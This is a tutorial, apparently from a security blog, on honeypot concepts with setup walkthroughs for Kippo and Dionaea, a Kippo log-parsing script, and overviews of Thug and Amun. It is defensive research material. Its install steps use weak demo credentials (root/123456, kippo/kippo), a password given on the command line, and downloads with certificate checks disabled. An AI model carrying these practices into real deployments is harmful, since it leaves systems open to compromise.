The Honeynet Project

Catalogue

1. Basic concepts of honeypots
2. Kippo: installing and using a low-interaction SSH honeypot
3. Dionaea: deploying a low-interaction honeypot framework
4. Thug
5. Amun malware honeypots
6. Glastopf web honeypot
7. Wordpot
8. Conpot SCADA/ICS honeypot
9. phoneyc
10. shockpot
11. MHN (Modern Honey Network)
12. Database Honeypots
13. awesome-honeypots
14. Honey Drive
15. Dockpot
16. How to use a honeypot system for intrusion analysis
17. Detecting Honeypots (counter-detection: honeypot detection techniques)
18. DNS Honeypot

 

1. Basic concepts of honeypots

Honeypot technology lets us capture the rules attackers follow when they attack, which gives us the data needed to extract and model attack patterns.

1. A honeypot is like an intelligence-gathering system: a target deliberately set up to lure attackers.
2. Once an attacker breaks in, we can collect their attack trail and learn how they launched the attack.
3. An important point is that the machine is a fake, and the attacker has to spend time breaking into it. During that time the administrator can pin down the attacker while protecting the real machines.
4. We can learn the techniques and exploit code attackers use against that service.
5. Some honeypots can capture malware, exploit code and so on, including an attacker's 0-days, and help reverse engineers improve the security of their own systems by analysing the captured malware.
6. A honeypot deployed on the internal network can help you discover vulnerabilities that may exist on other machines in that network.

The exact definition of a honeypot is contentious; however, most definitions are some form of the following:

A honeypot is "an information system resource whose value lies in unauthorized or illicit use of that resource" (from the www.securityfocus.com forum)

A more practical, but more limiting, definition is given by pcmag.com:

A server that is configured to detect an intruder by mirroring a real production system (a system mirrored from the real production environment). It appears as an ordinary server doing work, but all the data and transactions are phony. Located either inside or outside the firewall, the honeypot is used to learn about an intruder's techniques as well as to determine vulnerabilities in the real system.

0x1: Data collection is another technical challenge of setting up a honeypot

1) If the honeypot operator records every packet entering and leaving the system, everything the attacker does becomes plain to see.
2) The log files on the honeypot itself are also a good data source.
3) Be aware, however, that log files are easily deleted by the attacker (especially on high-interaction honeypots), so the usual approach is to have the honeypot send log copies to a better-protected remote syslog server on the same network.
4) Be sure to monitor the log server as well. If an attacker breaks into that server with a new technique, the honeypot will undoubtedly have proved its value.

0x2: Advantages and disadvantages of honeypots

1. Advantages

1. One advantage of honeypot systems is that they greatly reduce the amount of data to analyse. On an ordinary web or mail server the attack traffic is usually drowned out by legitimate traffic, whereas most of the traffic entering and leaving a honeypot is attack traffic. That makes browsing the data and identifying what attackers actually did much easier.
2. Fewer false positives, since no legitimate traffic uses the honeypot; they collect smaller, higher-value datasets since they only log illegitimate activity.
3. Work in encrypted environments.
4. Do not require known attack signatures, unlike an IDS.

2. Disadvantages

1. Can be used by an attacker to attack other systems.
2. Only monitor interactions made directly with the honeypot; the honeypot cannot detect attacks against other systems.
3. Can potentially be detected by the attacker.

0x3: Development history of honeypot technology

History of honeypot tools:
1. The DTK honeypot tool:
Binds to unused ports on the system and offers deceptive network services to any attack source that probes those ports.

2. The LaBrea honeypot software:
Accepts TCP connections to all idle IP addresses on the network and uses TCP window adjustment and persistent-connection tricks to implement a tarpit service, dragging out the duration of useless connections as long as possible and thereby slowing down network scanning and worm propagation.
http://support.microsoft.com/kb/842851/zh-cn

3. Honeyd
A "virtual honeypot framework", open-source software developed by the well-known security expert Provos.
    1) Introduced the approach of simulating various kinds of honeypot systems at the network protocol stack level.
    2) Honeyd can disguise itself as a specified operating system version at the "protocol stack fingerprint" level, deceiving active fingerprinting by attackers using tools such as nmap.
    3) Supports simulating virtual network topologies and provides simulated responses for various application-layer network services through plugins.
    4) With Honeyd, security researchers can easily build a honeypot system with a chosen operating system type and application services, for uses such as worm detection and response or spam monitoring.
    5) Because Honeyd was the first to introduce honeypot simulation at the protocol stack level, and adopted a flexible framework that can integrate honeypots for various application-layer services, it holds a pivotal position in the evolution of honeypot tools.

4. The Nepenthes honeypot software, developed by The Honeynet Project Giraffe Chapter
    1) It inherits Honeyd's protocol-stack simulation mechanism and framework structure and, aimed at monitoring actively propagating malicious code on the Internet, implements a malware sample collection tool suitable for large-scale deployment.
    2) Unlike earlier honeypot systems that tried to simulate the whole interaction of a network service, Nepenthes' basic design principle is to simulate only the vulnerable part of a network service. It uses "heuristic shellcode recognition" and "emulated execution" to discover exploitation attempts against network service vulnerabilities, extracts the download links of the actively propagating malicious code from them, and then captures the samples.
    3) This mechanism makes it more efficient at capturing automatically propagating malicious code than other existing honeypot tools.

The mainstream honeypot project in the industry today: The Honeynet Project http://www.honeynet.org/codeofconduct

5. Dionaea
Nepenthes has been replaced by Dionaea, a new-generation honeypot for capturing malicious code samples.
    1) Dionaea uses embedded Python scripts to simulate vulnerable services.
    2) It likewise uses libemu to detect shellcode.
    3) It supports IPv6 and TLS.
    4) Dionaea is currently the most technically advanced virtual honeypot tool with the best-optimised architecture.

6. GHH (Google Hack Honeypot)
    1) A web application honeypot researched and developed for web application attack threats.
    2) GHH targets the Google Hacking technique of searching for web applications with security vulnerabilities, in order to lure and log web application attacks. It can discover command injection, web spam, blog comment spam injection, web page defacement, bot implantation, phishing site hosting and other attack events.

7. HIHAT (High Interaction Honeypot Analysis Toolkit)
    1) Can automatically convert any PHP application into a web honeypot tool offering a fully interactive environment.
    2) Captures malicious web requests through "transparent linking", so that the threats facing existing PHP applications can be monitored and analysed.

8. The Kojoney and Kippo honeypots
    1) Pose as an SSH network service process and record the usernames and passwords tried in every SSH password brute-force attempt.
    2) After a password guess succeeds, they offer the attacker a simulated shell execution environment.
    3) They capture and record the source IP address, the SSH client type used, the commands entered and any attack tool files downloaded.

9. The client-side honeypot tool Capture-HPC
    1) In recent years, with the widespread use of network perimeter defences such as firewalls and intrusion prevention systems, exploitation of traditional network services has become increasingly hard to pull off, and client-side exploitation targeting browsers and plugins has become the mainstream security threat on the Internet.
    2) Honeypot technology has evolved along with this shift in threat focus, producing client-side honeypot tools such as Capture-HPC.
    3) This is a high-interaction client honeypot framework that runs browsers such as IE and Firefox inside Windows virtual machines and uses an in-kernel system state change monitor to detect whether the web page the browser is visiting contains client-side exploit code.

10. PhoneyC
    1) Uses "browser emulation" and "dynamic JavaScript analysis" to counter the obfuscation of malicious web page scripts.
    2) Detects the type of exploit contained in a malicious page by simulating various known browser and plugin vulnerabilities.
    3) Through dynamic opcode instrumentation of the JavaScript engine, it can detect heap spray attacks in malicious pages.

0x4: The key parts of honeypot technology

1. Core mechanisms
The core mechanisms are the components a honeypot must have to deceive and detect the attacker.
    1) Deception environment construction: build security resources that are enticing to the attacker and attract the attacker to probe, attack and exploit them. "Security resources" here means anything with an attack surface, including:
        1.1) the operating system the honeypot simulates, i.e. system-level vulnerabilities, for example MS06-28
        1.2) the system services and ports the honeypot simulates, for example RPC, SMB, FTP
        1.3) the application-layer services the honeypot simulates: CMS systems, VoIP, etc.
    2) Threat data capture: log the security threats that are lured in, obtaining raw data on every kind of security threat as comprehensively as possible:
        2.1) network connections
        2.2) raw packets
        2.3) system behaviour data
        2.4) malware samples (.exe, shellcode)
    3) Threat data analysis: on the basis of the captured raw threat data, analyse and trace the type and origin of the threat, and build awareness of the threat posture.

2. Auxiliary mechanisms
A summary of the other extension requirements of honeypot technology, mainly:
    1) security risk control
    2) configuration and management
    3) countermeasures against anti-honeypot techniques, etc.
The main goals of the auxiliary mechanisms:
    1) Security risk control must ensure that a deployed honeypot cannot be abused by the attacker to attack the Internet or the business network, so that the operator avoids ethical and even legal risk;
    2) Configuration and management lets the operator customise and maintain the honeypot system conveniently;
    3) The goal of anti-honeypot countermeasures is to improve the honeypot's deceptiveness and avoid being identified by technically skilled attackers using honeypot-detection techniques.

0x5: Classifying honeypots by level of interaction

1. Low-interaction honeypot (simulates a service virtually)
    1) server-side honeypots: DTK, LaBrea, Honeyd, Nepenthes, Dionaea
    2) application-layer honeypots: Glastopf, GlastopNG, SPAMPot, Kojoney, Kippo
    3) client-side honeypots: PhoneyC
2. High-interaction honeypot (sits alongside a real service and monitors it as a honeypot)
    1) server-side honeypots: HoneyBow, Argos
    2) application-layer honeypots: GHH, HIHAT
    3) client-side honeypots: Capture-HPC, HoneyMonkey, SpyProxy
3. Sticky honeypots (tarpits): this type of honeypot spins up new virtual machines on new IP addresses that simulate vulnerable services as bait. The attacker therefore spends a long time attacking, which leaves enough time to handle the attack and pin down the attacker.
4. Honeypots dedicated to capturing malware: for example, simulating services with the Shellshock, Jenkins, Redis, Struts2 or UDF vulnerabilities, luring the attacker to plant malicious programs after breaking in, so that samples can be obtained.

Relevant Link:

http://dionaea.carnivore.it/
http://netsec.ccert.edu.cn/zhugejw/2011/09/08/kippo/
http://297020555.blog.51cto.com/1396304/553382/
http://netsec.ccert.edu.cn/zhugejw/files/2011/09/Kippo介紹PPT.pdf
http://netsec.ccert.edu.cn/zhugejw/files/2011/09/Kippo-介紹.pdf
http://www.2cto.com/Article/201403/285377.html
http://blog.csdn.net/sealyao/article/details/6708923
http://security.ctocio.com.cn/securitycomment/414/8185414.shtml
面向蜜場環境的網絡攻擊流重定向機制的研究與實現.pdf
Dionaea低交互式蜜罐介紹.pdf
Collapsar.pdf
2007.通訊學報.HoneyBow_一個基於高交互式蜜罐技術的惡意代碼自動捕獲器.諸葛建偉.pdf
蜜罐技術研究與應用進展.pdf
Kippo介紹PPT.pdf
Kippo-介紹.pdf
Dionaea低交互式蜜罐部署實踐.pdf
http://ruo.me/index.php/archives/77
http://www.05112.com/anquan/wzaq/stwx/2014/0312/8400.html
http://www.05112.com/anquan/wlgf/2013/0609/3444.html
http://www.freebuf.com/articles/system/12696.html
https://en.wikipedia.org/wiki/Honeypot_(computing)
https://www.projecthoneypot.org/index.php
http://www.honeynet.org/
http://www.honeyd.org/background.php
http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey.pdf
https://www.honeynet.org/node/1267
http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-honeynet-project/bh-us-03-honeynet.pdf

The Honeynet Project

http://www.honeynet.org/project 

 

2. Kippo: installing and using a low-interaction SSH honeypot

Kippo is an open-source program written in Python that simulates a port-listening service, imitating the appearance of an SSH server and carrying out a fake interaction with potential attackers.
Kippo is a medium-interaction SSH honeypot designed to log brute-force attacks and, most importantly, the entire shell interaction performed by the attacker.

0x1: Features

1. Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
2. Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included
3. Session logs stored in a UML-compatible format for easy replay with original timings
4. Just like Kojoney, Kippo saves files downloaded with wget for later inspection
5. Trickery; ssh pretends to connect somewhere, exit doesn't really exit, etc

0x2: RHEL5 installation

1. Download the RPM packages needed to prepare the environment on RHEL5
python26-2.6-geekymedia1.i386.rpm
python26-2.6-geekymedia1.src.rpm
python26-debuginfo-2.6-geekymedia1.i386.rpm
python26-devel-2.6-geekymedia1.i386.rpm
python26-libs-2.6-geekymedia1.i386.rpm
python26-test-2.6-geekymedia1.i386.rpm
python26-tools-2.6-geekymedia1.i386.rpm
tkinter26-2.6-geekymedia1.i386.rpm
Twisted-10.2.0.tar.bz2
zope.interface-3.3.0.tar.gz
pycrypto-2.0.1.tar.gz
pyasn1-0.0.12a.tar.gz

2. Install these prerequisite packages
    1) libTix8.4.so is needed by tkinter26-2.6-geekymedia1.i386
    yum install tix tcl tk
    2) install the RPM packages
    rpm -ivh *.rpm
    3) install Twisted
    tar -xvf Twisted-10.2.0.tar.bz2
    cd Twisted-10.2.0
    python26 setup.py build
    python26 setup.py install
    4) install zope.interface
    tar -xvf zope.interface-3.3.0.tar.gz
    cd zope.interface-3.3.0
    python26 setup.py build
    python26 setup.py install
    5) install pycrypto
    tar -xvf pycrypto-2.0.1.tar.gz
    cd pycrypto-2.0.1
    python26 setup.py build
    python26 setup.py install
    6) install pyasn1 (the archive is a tarball, so unpack it with tar rather than unzip)
    tar -xvf pyasn1-0.0.12a.tar.gz
    cd pyasn1-0.0.12a
    python26 setup.py build
    python26 setup.py install

3. Prepare Kippo's logging environment
    1) Kippo needs to store its data in a database, so create a separate kippo database
    /etc/init.d/mysqld start
    mysql -uroot -p111
    create database kippo;
    grant all privileges on kippo.* to kippo@'localhost' identified by 'kippo';
    flush privileges;
    2) Create the tables Kippo needs
    cd /usr/local/src/kippo-0.5/doc/sql/
    vim mysql.sql: add a line at the top: USE kippo
    mysql -ukippo -pkippo < mysql.sql
 
4. Install Kippo and run it as a non-root user
    1) wget http://kippo.googlecode.com/files/kippo-0.5.tar.gz
    2) tar zxvf kippo-0.5.tar.gz
    3) cd /usr/local/src/kippo-0.5
    4) vim kippo.cfg
    5) useradd kippo
    6) chown -R kippo.kippo /usr/local/src/kippo-0.5
    7) su -l kippo
    8) cd /usr/local/src/kippo-0.5
    9) ssh-keygen -t rsa
    ./private.key (the file name given to ssh-keygen; it then prints the key fingerprint)
    28:a5:58:10:78:39:ee:ed:69:1c:9e:c1:b8:9f:81:57 kippouser@node2
    10) ./start.sh

5. If start.sh fails with: import MySQLdb, uuid / exceptions.ImportError: No module named MySQLdb / Failed to load application: No module named MySQLdb
    1) download and install setuptools
    wget http://pypi.python.org/packages/source/s/setuptools/setuptools-0.6c11.tar.gz --no-check-certificate
    tar zxvf setuptools-0.6c11.tar.gz
    cd setuptools-0.6c11
    python26 setup.py build
    python26 setup.py install
    2) download and install mysql-python
    wget https://pypi.python.org/packages/source/M/MySQL-python/MySQL-python-1.2.3.tar.gz --no-check-certificate
    tar zxvf MySQL-python-1.2.3.tar.gz
    cd MySQL-python-1.2.3
    python26 setup.py build
    python26 setup.py install

Installation complete.
Log in remotely from a client machine:
ssh root@192.168.159.128 -p 2222
Enter the password 123456 (the one configured in the config file a moment ago).

6. View the records through the log or the database
cd /usr/local/src/kippo-0.5
tail -10 log/kippo.log

Once the program starts, the SSH honeypot is up and listening for connections from outside.

Kippo automatically records every access trail and saves it to MySQL (if you configured that). How to interpret this data is the next problem, i.e. data visualisation: from which angle to analyse the data. In principle, intrusion analysis should achieve the following:

1) Cover as many possible access paths as possible, i.e. simulate as many mainstream services, ports and applications as possible.
2) Record all access trails as completely as possible; at the recording stage, capture every potentially useful piece of information broadly and indiscriminately, in preparation for later data extraction and layering.
3) Look at the recorded data from the perspective of intrusion and counter-intrusion, and build corresponding analysis models. Such a model should be highly targeted and able to reflect, directly or indirectly, intrusion trends, causes and intensity.

http://bruteforce.gr/kippo-graph can achieve data visualisation to a certain extent; we can extend its functionality to better model and analyse the data captured by the honeypot.
SSH honeypot visualisation techniques
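As an added example (not Kippo's own code) of the first analysis step described above, the following script parses the login-attempt lines of log/kippo.log and aggregates them per source IP, per credential pair and per successful session. The line layout follows what Kippo's ssh-userauth service writes; the sample lines, IPs and session numbers are constructed.

```python
import re
from collections import Counter, defaultdict

# One line per authentication attempt, in the layout Kippo's ssh-userauth
# service writes to log/kippo.log (the sample lines below are constructed).
LOGIN_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) "
    r"\[SSHService ssh-userauth on HoneyPotTransport,(?P<session>\d+),(?P<ip>[\d.]+)\] "
    r"login attempt \[(?P<user>[^/\]]*)/(?P<password>[^\]]*)\] (?P<result>succeeded|failed)$"
)

# Constructed sample: two sources brute-forcing a honeypot whose data/userdb.txt
# holds root:0:123456, so every root/123456 guess "succeeds".
SAMPLE_LOG = """\
2014-03-12 10:20:30+0800 [SSHService ssh-userauth on HoneyPotTransport,2,10.0.0.7] login attempt [root/toor] failed
2014-03-12 10:20:31+0800 [SSHService ssh-userauth on HoneyPotTransport,2,10.0.0.7] login attempt [root/password] failed
2014-03-12 10:20:32+0800 [SSHService ssh-userauth on HoneyPotTransport,2,10.0.0.7] login attempt [root/123456] succeeded
2014-03-12 10:21:05+0800 [SSHService ssh-userauth on HoneyPotTransport,3,10.0.0.9] login attempt [admin/admin] failed
2014-03-12 10:21:06+0800 [SSHService ssh-userauth on HoneyPotTransport,3,10.0.0.9] login attempt [root/123456] succeeded
2014-03-12 10:25:00+0800 [HoneyPotTransport,3,10.0.0.9] connection lost
"""


def parse_attempts(log_text):
    """Return one dict per authentication attempt; every other line
    (connection lost, command execution, ...) is ignored here."""
    attempts = []
    for line in log_text.splitlines():
        match = LOGIN_RE.match(line.strip())
        if match:
            attempts.append(match.groupdict())
    return attempts


def summarise(attempts):
    """Aggregate attempts into the three views an analyst looks at first:
    volume per source, the credentials tried most, and which sessions got in."""
    per_ip = Counter(a["ip"] for a in attempts)
    credentials = Counter((a["user"], a["password"]) for a in attempts)
    successes = defaultdict(set)
    for a in attempts:
        if a["result"] == "succeeded":
            successes[a["ip"]].add(a["session"])
    return {
        "attempts_per_ip": dict(per_ip),
        "top_credentials": credentials.most_common(3),
        "successful_sessions": {ip: sorted(s) for ip, s in successes.items()},
    }


def sessions_to_replay(summary):
    """Only sessions in which a guess succeeded can contain shell interaction,
    so these are the (ip, session) pairs whose tty recordings are worth replaying."""
    return sorted(
        (ip, session)
        for ip, sessions in summary["successful_sessions"].items()
        for session in sessions
    )


if __name__ == "__main__":
    result = summarise(parse_attempts(SAMPLE_LOG))
    for ip, count in sorted(result["attempts_per_ip"].items()):
        print("%-12s %d attempts" % (ip, count))
    print("top credentials:", result["top_credentials"])
    print("replay:", sessions_to_replay(result))
```

Point the script at the real file with parse_attempts(open("log/kippo.log").read()) once Kippo has been running for a while.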

0x3: Ubuntu 14.04 64-bit installation

git clone https://github.com/desaster/kippo.git
cd kippo
pip install twisted
pip install twisted --upgrade

pip install PyCrypto 
pip install pycparser

sudo apt-get install libffi-dev
pip install cffi
wget https://pypi.python.org/packages/source/c/cffi/cffi-1.5.2.tar.gz
tar -zvxf cffi-1.5.2.tar.gz
cd cffi-1.5.2
python setup.py install

pip install idna
pip install pyasn1
pip install enum34
pip install ipaddress 
pip install cryptography
pip install cryptography --upgrade

useradd littlehann
su littlehann

cp kippo.cfg.dist kippo.cfg
./start.sh

Files of interest

1. data: holds the SSH keys, lastlog.txt and userdb.txt. lastlog.txt is the output of the last command, i.e. the record of logins to the honeypot, and can also be faked. userdb.txt lists the users who can log in; a user may be given several passwords, one entry per line, in the format username:uid:password.

2. honeyfs: the etc directory contains the files group, hostname, hosts, issue, passwd, resolv.conf and shadow; when the attacker runs cat /etc/filename, the contents of the corresponding text file are shown. The proc directory contains cpuinfo, meminfo and version; cat /proc/filename shows the contents of the corresponding text file.

3. log: where the log files live; the directory contains the kippo.log file and the tty directory. kippo.log holds the start-up records, which IPs connected, and so on. The tty directory holds the recording of each SSH session's operations; strings filename shows its content directly.

4. txtcmds: where commands live; these commands are text files, and running the command simply displays the file content.

5. kippo: the core files, which simulate the interactive commands and so on.

6. dl: where files downloaded with wget and the like are stored.

7. utils: convert32.py converts tty logs to a standard 32-bit decimal format (in practice strings is enough). createfs.py can be used to model the files and directories of a real system; its output has to be redirected to a file that then replaces fs.pickle, after which the real system is imitated.

8. fsctl.py: modifies an already generated fs.pickle; help lists the available commands.

9. passdb.py: adds account passwords.

10. playlog.py: replays the logs under log/tty/.

Relevant Link:

For installing and configuring Kippo, refer to the following articles:
http://code.google.com/p/kippo/
http://www.haiyun.me/archives/centos-install-kippo.html
http://297020555.blog.51cto.com/1396304/553382/
http://drops.wooyun.org/papers/4578
https://github.com/desaster/kippo

 

3. Dionaea: deploying a low-interaction honeypot framework

Although Dionaea is also a low-interaction honeypot system, unlike Kippo it integrates many different types of honeypot together. Overall it is structured as a framework, which makes it easy for the open-source community to extend, and it supports simulating honeypots for FTP, HTTP, SSH, MySQL, MSSQL, SIP and other protocols. We can use it to deploy a honeypot environment closer to reality, and thereby capture attack samples and attack trail data more effectively.

The Dionaea honeypot is designed to trap malicious attacks and obtain attack sessions and malware samples. By simulating various common services it:

1) captures attack data against the services
2) records the source and destination IP, port, protocol type and other information
3) as well as the complete network session
4) automatically analyses any shellcode the session may contain, including its function calls and downloaded files, and obtains the malicious program

Dionaea's overall structure and working mechanism

1) Dionaea is an application that runs on Linux. Placed in a network, it opens the default ports of services common on the Internet; when an external connection arrives it responds by simulating the normal service, while recording the inbound and outbound network data.
2) The network data is passed through a detection module and handled by category; if shellcode is present it is executed in emulation.
3) The program automatically downloads the malicious files that the shellcode, or subsequent attack commands, specify for download.
4) The information from the entire flow, from data capture to file download, is saved to a database for later analysis or submission to a third-party analysis organisation.

(Figure from the paper "An introduction to the Dionaea low-interaction honeypot" by Zhuge Jianwei)

Services Dionaea can simulate

1) SMB
2) HTTP, HTTPS
3) FTP, TFTP
4) MSSQL, MySQL
5) SIP (VoIP)
6) shellcode execution
7) malware download and execution

For installing and configuring Dionaea, refer to the following articles:

http://ruo.me/index.php/archives/77
http://www.05112.com/anquan/wzaq/stwx/2014/0312/8400.html
http://dionaea.carnivore.it/

1. Install dependencies
apt-get update
apt-get install aptitude
aptitude install libudns-dev
aptitude install libglib2.0-dev
aptitude install libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config

2. Create the Dionaea directory
mkdir /opt/dionaea
cd /opt/dionaea

3. Install the other dependencies
cd /opt/dionaea
    3.1) liblcfg
    git clone git://git.carnivore.it/liblcfg.git
    cd liblcfg/code
    autoreconf -vi
    ./configure --prefix=/opt/dionaea
    make install
    cd ..
    cd ..
    3.2) libemu
    git clone git://git.carnivore.it/libemu.git
    cd libemu
    autoreconf -vi
    ./configure --prefix=/opt/dionaea
    make install
    cd ..
    3.3) libnl
    apt-get install libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev
    3.4) libev
    wget http://dist.schmorp.de/libev/Attic/libev-4.04.tar.gz
    tar xfz libev-4.04.tar.gz
    cd libev-4.04
    ./configure --prefix=/opt/dionaea
    make install
    cd ..
    3.5) Python 3.2
    wget https://www.python.org/ftp/python/3.2.2/Python-3.2.2.tgz
    tar xfz Python-3.2.2.tgz
    cd Python-3.2.2/
    ./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/ -L/usr/lib/i386-linux-gnu/"
    make && make install
    cd /opt/dionaea/bin
    ln python3.2 /usr/bin/python3
    cd ..
    3.6) sqlite 3.3.7
    wget http://www.sqlite.com.cn/Upfiles/source/sqlite-3.3.7.tar.gz
    tar xzf sqlite-3.3.7.tar.gz
    cd sqlite-3.3.7
    mkdir /home/sqlite-3.3.7
    ./configure --prefix=/home/sqlite-3.3.7
    make && make install && make doc
    cd /home/sqlite-3.3.7/bin/
    ln sqlite3 /usr/bin/sqlite3
    3.7) Cython
    cd /opt/dionaea
    wget http://cython.org/release/Cython-0.15.tar.gz
    tar xfz Cython-0.15.tar.gz
    cd Cython-0.15
    /opt/dionaea/bin/python3 setup.py install
    cd ..
    3.8) libpcap
    wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
    tar xfz libpcap-1.1.1.tar.gz
    cd libpcap-1.1.1
    ./configure --prefix=/opt/dionaea
    make && make install
    cd ..

4. Build and install dionaea
git clone git://git.carnivore.it/dionaea.git
cd dionaea
autoreconf -vi
./configure --with-lcfg-include=/opt/dionaea/include/ \
    --with-lcfg-lib=/opt/dionaea/lib/ \
    --with-python=/opt/dionaea/bin/python3.2 \
    --with-cython-dir=/opt/dionaea/bin \
    --with-udns-include=/opt/dionaea/include/ \
    --with-udns-lib=/opt/dionaea/lib/ \
    --with-emu-include=/opt/dionaea/include/ \
    --with-emu-lib=/opt/dionaea/lib/ \
    --with-gc-include=/usr/include/gc \
    --with-ev-include=/opt/dionaea/include \
    --with-ev-lib=/opt/dionaea/lib \
    --with-nl-include=/opt/dionaea/include \
    --with-nl-lib=/opt/dionaea/lib/ \
    --with-curl-config=/usr/bin/ \
    --with-pcap-include=/opt/dionaea/include \
    --with-pcap-lib=/opt/dionaea/lib/
make && make install

After installation, it can be started in the background.

Dionaea runs according to command-line parameters, which let you choose:

1) different run environments
2) tasks
3) which events to filter
4) what to record

The configuration file specifies in detail:

1) the modules enabled when the honeypot runs
2) where the log files are saved
3) the parameters of the extension features

In the default configuration Dionaea automatically picks a network interface to listen on.

cd /opt/dionaea/bin
1) ./dionaea -l all,-debug -L '*'
2) ./dionaea -l all,-debug -L 'con*,py*'
3) ./dionaea -u nobody -g nogroup -r /opt/dionaea/ -w /opt/dionaea -p /opt/dionaea/var/dionaea.pid

Dionaea listens on these ports and captures the access trail data of potential attackers.

Compared with Kippo, Dionaea's architecture is much larger, so its configuration file and module structure look much more complex. That is normal; if we compare its architecture with that of MSF we find many similarities and differences: each service Dionaea simulates is implemented as a separate module in a Python script, and the configuration file holds the information about those modules.

Let's take a quick look at its configuration file.

Dionaea's default configuration file is /opt/dionaea/etc/dionaea.conf. Its content is divided into:
1. logging
Configures where logs are stored, the event level to record, and the domain. This includes ordinary and error logs, by default under /opt/dionaea/var/log, recording all events, warnings and error events respectively.

2. processors
Configures libemu and the streamdumper module used to export data streams.
3. libemu
The allowed protocols can be added or removed; configures performance parameters for shellcode detection such as the maximum stream size, the tracing-step limit and the number of concurrent executions.
4. streamdumper
Configures the protocols allowed and rejected when exporting data streams, and where the streams are saved.
5. downloads
Configures where downloaded malicious files are saved.
6. bistreams
Configures where data streams are saved.
7. submit
Sets up automatic submission of malicious files over HTTP to a specific address; the exact settings depend on the receiving server.
8. listen
Configures the network interface IP Dionaea listens on; by default it is detected automatically.
9. modules
Configures the working parameters of the various modules. Some "required modules": curl, libemu, pcap, and the simulated services, among others.

For a honeypot system, data visualisation and modelling of the data are always a focus. Dionaea's captured data can be parsed in the following ways:

1. Read the logs with the tools bundled with dionaea
cd /opt/dionaea/dionaea/modules/python/util
python3 ./readlogsqltree.py -t $(date '+%s')-24*3600 /opt/dionaea/var/dionaea/logsql.sqlite
python3 ./gnuplotsql.py -d /opt/dionaea/var/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd

2. Visualise with DionaeaFR
cd /opt/
git clone https://github.com/RootingPuntoEs/DionaeaFR.git
cd /opt/DionaeaFR
This tool involves node.js, Django and similar tools, which I had not used before, but they seem to be widely used in the industry for data visualisation; I plan to look into them next and try building something fun with node.js and Django.
http://www.freebuf.com/articles/system/12696.html

 

4. Thug

1. Thug is a Python low-interaction honeyclient based on a hybrid static/dynamic analysis approach.
2. Thug provides a DOM implementation which is (almost) compliant with the W3C DOM Core, HTML, Events, Views and Style specifications (Level 1, 2 and partially 3).
3. Thug makes use of the Google V8 JavaScript engine wrapped through PyV8 in order to analyze malicious JavaScript code, and of the Libemu library wrapped through Pylibemu in order to detect and emulate shellcodes.
4. Currently the following personalities are emulated, and about 90 vulnerability modules (ActiveX controls, core browser functionalities, browser plugins) are provided:
    1) 9 Internet Explorer personalities (Windows XP, Windows 2000, Windows 7, Windows 10)
    2) Microsoft Edge (Windows 10)
    3) Chrome (Windows XP, Windows 7, MacOS X, Android 4.0.3, Android 4.0.4, Android 4.1.2, Linux, iOS 7.1, iOS 7.1.1, iOS 7.1.2, iOS 8.0.2, iOS 8.1.1, iOS 8.4.1, iOS 9.0.2)
    4) Firefox (Windows XP, Windows 7, Linux)
    5) Safari (Windows XP, Windows 7, MacOS X, iOS 7.0.4, iOS 8.0.2, iOS 9.1)

0x1: Build and Install

Relevant Link:

http://buffer.github.io/thug/doc/intro.html
http://buffer.github.io/thug/doc/index.html

 

5. Amun malware honeypots

In this report we describe a low-interaction honeypot, which is capable of capturing autonomous spreading malware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local harddisc, for further analyses. As a result, we are able to collect at best unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures.

0x1: Implementation

Amun is written in Python, a small and simple scripting language. The honeypot is made up of different components:

1. Amun Kernel
2. Request Handler
3. Vulnerability Modules
4. Shellcode Analyzer
5. Download Modules
6. Logging Modules
7. Submission Modules

1. Amun Kernel

The Amun Kernel is the core component of the honeypot. This part contains the startup and configuration routines, as well as the main routines of the software. During the startup phase

1. the Amun Kernel initialises the regular expressions that are used for shellcode matching
2. reads the main configuration file: "conf/amun.conf"
3. creates the internal logging modules
4. loads all external modules:
    1) vulnerability modules: responsible for emulating single vulnerabilities
    2) the logging modules: that log attack information to other services like databases
    3) the submission modules: that for example write downloaded binaries to hard disc

For each loaded vulnerability module, the Amun Kernel retrieves the list of associated ports and stores the vulnerability module in an array with the port as key:

Array ( 
    [139] => Array ( 
        [0] => vuln-netdde 
        [1] => vuln-ms06040 
    ) 
    [445] => Array ( 
        [0] => vuln-ms08067 
        [1] => vuln-ms06040 
        [3] => vuln-ms06070 
    ) 
)

So several vulnerability module handlers can be bound to the same port, for example when port 80 carries several vulnerabilities.
After all initial modules are loaded and the appropriate TCP servers are started, the Amun Kernel enters the main loop.
During this loop it iterates over all connected sockets and

1. triggers download events
2. transfers information to certain modules
3. re-reads the main configuration file for changes. Re-reading the main configuration file allows certain settings to be changed at runtime; Amun does not have to be stopped and restarted.

2. Amun Configuration
Amun uses a single configuration file for adjusting all parameters necessary to run the honeypot.

1. ip: defines the IP address Amun will listen on during runtime. It accepts:
    1) a single IP address
    2) or the wildcard IP address 0.0.0.0 to listen on all addresses and interfaces assigned to the host system
    3) or IP address ranges (192.168.0.1 - 192.168.0.5)
    4) or an interface name (e.g. eth0)
    5) or CIDR notation for networks (192.168.0.0/24)
    6) or a comma-separated list of IP addresses (several IP entries separated by commas)
2. A user and group can be defined, which limit the privileges of Amun.
3. Timeout parameters, which adjust the way Amun times out connections, open ports, and download requests. As some attacks might not work correctly it is possible that attackers, for example, do not connect to the requested port; therefore Amun needs to close this port after a certain amount of time has passed. The options are named:
    1) connection timeout
    2) bindport timeout
    3) ftp timeout
4. Amun also offers the possibility to reject certain attacking hosts from reconnecting in the case of certain events. These events are:
    1) malware download was refused
    2) download did not finish due to a timeout
